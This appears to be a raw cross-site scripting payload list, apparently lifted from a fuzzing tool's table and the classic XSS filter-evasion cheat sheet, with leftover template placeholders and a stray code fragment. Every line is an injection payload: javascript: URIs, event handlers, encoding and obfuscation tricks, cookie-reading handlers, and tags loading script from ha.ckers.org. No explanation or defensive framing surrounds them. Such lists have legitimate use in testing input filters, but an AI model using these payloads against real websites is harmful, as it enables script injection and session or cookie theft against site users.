<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
- XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><IMG SRC="javascript:javascript:alert(1)"></XML>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body onscroll=javascript:alert(1)> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="javAascript:javascript:alert(1)">test1</a> <a href="javaascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ;!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
|